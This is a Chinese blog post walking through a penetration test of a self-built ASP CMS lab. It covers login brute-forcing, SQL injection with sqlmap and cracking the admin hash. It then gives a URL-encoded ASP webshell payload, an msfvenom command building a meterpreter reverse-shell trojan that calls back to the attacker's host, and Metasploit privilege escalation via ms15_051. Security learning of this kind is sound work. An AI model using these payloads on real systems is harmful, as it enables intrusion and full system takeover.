一次渗透经验分享

最新推荐文章于 2024-04-24 11:06:31 发布
最新推荐文章于 2024-04-24 11:06:31 发布
阅读量1.4k 收藏 9
点赞数 3
文章标签: 安全渗透 灰盒测试 工具使用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/win176489/article/details/90646663
版权 
                               **一次渗透经验分享**
 通过在网上看到好多大佬们使用msf工具来进行渗透测试,然后出于学习和探索工具的功能,自己在本地搭建了一个asp的靶场环境进行渗透。效果还是很不错的。
 测试环境:目标机   windows2003 192.168.42.132
                   攻击机   kali 192.168.43.252   win10(我本机) 192.168.43.109
 首先在本机访问192.168.42.132  
 ![这个cms是我从网上下载的](https://img-blog.csdnimg.cn/20190528203524740.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dpbjE3NjQ4OQ==,size_16,color_FFFFFF,t_70)

进去点击会发现前台可以登陆账号

很惊喜,前台没有设置验证码,我们可以尝试爆破一下,打开burp设置好代理,加上本地字典跑一下试试。

成功爆破出前台登陆的用户和密码,但是登录上去发现貌似除了随便点点再退出账号并没又什么用。。。

再测试一下是不是可以注入呢,通过自己测试,找到一个报错的url
http://192.168.42.132/index.asp?a=news_list&id=21'

这个url地址放sqlmap跑一下,什么都跑不出来。。这里也不行
继续找,发现刚刚用户名加个 ‘ 也能报错

尝试post注入,把数据包放在sqlmap里跑一下试试


只跑出来一个user表,里面还是空的,所以我思考了一下,目标机用的是ACCESS数据库,因为sqlmap只能通过自己的字典进行枚举,于是我尝试将我自己建的表名输入进去 ,之后就爆出来了字段。

MD5解密一下 其中一个后台用户名为admin 密码admin888
现在可以登陆后台了,前台点击管理入口
输入用户密码成功到后台。在后台尝试了上传文件,发现网站的过滤很严,这条路是行不通了

于是测试能否在系统参数配置中插入一句话,查看代码我们发现这个文件的代码是经过加密处理的

通过分析源码,构造出插入的payload为%22%25%3e%3c%25eval+request+(%22pass%22)%25%3e%3c%25%27
利用抓包插入payload

放包,用菜刀连接index.asp(从源码分析得出index.asp包含刚刚修改的asp文件)

成功getshell ,但是这个权限很低,怎么才能提到系统权限呢,在kali机打开msf
使用venom模块生成test.exe的木马文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.43.252 LPORT=8888 -f exe > ./test.exe

将生成的木马文件和32为的cmd.exe传到目标机的目录下
然后在kali机调用 expolit/multi/handler模块

设置本地监听的IP 和端口 然后run

在菜刀中运行test.exe

kali机获取了一个会话连接

执行命令whoami ,得到的是一个普通权限

利用exoploit的模块提权,利用溢出漏洞进行提权
use exploit/windows/local/ms15_051_client_copy_image

返回会话1 利用ps查看新建的2540会话,再利用命令将会话迁移到2540

利用getsystem命令提权,成功执行并建立一条新的会话

再将会话迁移到新的会话,执行shell命令就提权成功啦

到此处为止,成功get到了操作系统的权限。
成功的道路需要知识和经验一点一点的铺垫,日积月累,才能突破自己

刺 心
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
给第一次做渗透项目的新手总结的一些感悟
hackzkaq的博客
06-07 2067
说在前面首先很重要的是授权 ,之前也看过很多关于渗透测试的文章,但是因为一些现实因素等等问题,没(bu)有(gan)真正实操,最近由于一次偶然的机会,什么都不会的我接到了一个渗透测试项目然后就把最近学到的一些东西,和一些小感悟,小技巧记录下来,由于一些特殊原因,本文中不涉及到渗透过程中的任何敏感信息首先跟我一样菜当然是装不出大神的,当然还是多学,多积累最重要,但是既然都开始了,就不能显得太划水,下面的操作不能让你成为大...
Mic8十年渗透分享
04-21
Mic8十年渗透经验分享。包含:基于白名单Compiler.exe执行payload;基于MSF发现内网存活主机;高级持续渗透-关于后门;利用ssh隧道将公网meterpreter弹至本地的msf中;windows 单机免杀抓明文或hash;窃取,伪造模拟各种windows访问令牌[token利用];攻击Mysql服务等
渗透某培训平台经历
最新发布
jennycisp的博客
04-24 1038
然后发现student.***和learn.***的公网IP一样,但是Getshell之后的内网IP和文件内容之类的完全不一样,于是猜测IP***.***.***.121是一个反向代理服务器,基于请求的Host再分配给不同的内网机器来处理,也就是说student.***和learn.***应该是没有公网IP的。发现其中有一个数据库名字和主站某管理登录页面的URI一样,于是摸了一下摸到sys_user表,找到了管理登录的数据(真nb,这几个站连管理员的数据表名字都一模一样,真就找都不用找)。
2014自己总结的渗透经验[转]
weixin_30399871的博客
01-23 310
有经验的老鸟们就不用看了。(大牛绕过) 我们每当渗透一个站点的时候必须要了解他的信息。 这是最基础也是最基本的常识。 第一要看网站是什么脚本? 是什么程序? 有多少类的程序? 系列:http://www.zzrsks.com/这个站点 我们可以看出是伪静态的。那么如何判断他是属于什么脚本的呢?有很多种方法我就介绍一下最基本的方法。方法1:网站根目录里index.phpindex.aspin...
渗透测试的8个步骤—转载
热门推荐
花米徐xl_lx的专栏
10-31 6万+
渗透测试的8个步骤 展现一次完整的渗透测试过程及思路 发布时间:2017年10月25日 15:11    浏览量:1104  渗透测试这个事情不是随便拿个工具就可以做了, 要了解业务还需要给出解决方案 。之前安全加介绍了金融行业 实战微信银行渗透测试, 运营商 渗透测试实战 ,今天让我们来说说 渗透测试 的流程及渗透测试相关概念。 渗透测试流程 渗透测试与入侵的最大区别 渗透
一次攻防实战演习复盘总结.pdf
09-09
"一次攻防实战演习复盘总结" 一、知彼控制成本:反检测,反清理:三流分立 在攻防演习中,攻击者也是讲成本的,因此防守方...本文总结了一次攻防实战演习的经验教训,旨在帮助防守方更好地防御攻击者,提高防御能力。
内网渗透经典文集
03-03
"小记一次渗透过程:一台工作站后面的大型内网!.pdf"可能讲述了从单一入口点进入并逐步控制整个内网的过程。这将强调单点突破的重要性,以及后续横向移动的策略。 "内网渗透以及安全问题的解决参考办法.pdf"可能...
062-渗透测试之自力更生.pdf
09-20
【描述】:本文主要介绍了一次渗透测试的过程,通过使用本地搭建环境来复现测试场景,详细记录了在渗透测试中的思路、遇到的问题以及解决方法。 【标签】:互联网 【正文】: 渗透测试是网络安全领域的重要环节,...
如何在小学语文教学中渗透生命教育.doc
10-07
例如,在教授《一次成功的实验》时,教师可以引导学生分享自己的实验经历,无论是成功还是失败,都应鼓励他们认识到成功背后的坚持和努力,以及从失败中汲取经验,培养他们面对挫折的勇气和韧性。 2. 文本解读中的...
主题一月是故乡明.doc
10-08
总的来说,"主题一月是故乡明"不仅是一次对中国传统文化的探索,更是一次全面培养学生活动策划、信息处理、团队协作等多方面能力的实践教学。通过这样的活动,学生们能够在亲身体验中深化对中秋节的理解,同时也促进...
完整渗透测试过程讲解
09-04
完整渗透测试过程讲解
入侵渗透的经验
centos的博客
10-18 6166
2012-11-20 09:12 (分类:网络安全) 先看站点 拿shell的方法太多了  主要是提权和入侵思路  踩点  PING命令ping系统      TTL=32     9X/ME                              TTL=64     LINUX                              TTL=128    20
一次授权渗透实战
bylfsj的博客
01-13 2086
文章目录前言目标基本信息Getshell过程后缀名校验绕过内容校验绕过内容加密内容混淆总结 前言 很久没有整理实战文章了,恰好这周项目上有一个目标折腾了两天时间,记录分享下其中的心路历程(本次渗透过程均在目标授权下进行,请勿进行非法渗透行为)。 目标基本信息 某政务网站 服务器–windows 数据库–未知 中间件–Tomcat 开发语言–...
常见代码执行函数
L_lemo004的博客
07-12 6147
常见代码执行函数,如 eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() 文件操作函数 动态函数(a(a(a(b)) 1、eval() eval() 函数把字...
MSF(1)——一次完整的渗透流程
realmels的博客
09-04 3965
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub靶机渗透之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件.
福利时刻 十年网络安全大佬的Web安全技术分享
xueshenlaila的博客
06-09 605
作为拥有着10年经验的渗透安全测试工程师,一路也是从小白历经磨难成长起来的我,给现在的新手小白一些建议。渗透安全的范围其实要学习的东西很广泛的,比如系统安全、移动安全、无线安全、web安全等很多方向。 作为小白呢,这里建议大家可以从web安全入手,web安全领域相对来说比较好入门,对于小白来说呢,入门是相对来说友好一些的。我刚开始的时候也是从web安全开始入手的,web安全的知识有哪些呢,我给大家简单的梳理一下知识轮廓。 Web安全基础要学习那些知识呢? 01对于系统的操作 比如w...
一次完整的渗透测试流程
HIM_MRY的博客
08-30 6314
渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——> 网络安全法 渗透测试分为白盒测试和黑盒测试 1.白盒测试就...
如何成功实现一次渗透测试
04-15
如果你想在网络中执行渗透测试,你需要首先确定你的目标是什么。一旦你找到了目标系统,你可能需要使用漏洞扫描工具来寻找系统中已知的漏洞。如果你找到了漏洞,你可以通过利用漏洞来获取对系统的访问权限。在实际的实施过程中,你可能需要一些专业的工具和技术,如密码爆破、社交工程和漏洞利用等。最关键的是,你需要确保你已经经过授权并拥有完整的许可证,这样你才能进行渗透测试,否则你可能会面临严重的法律问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值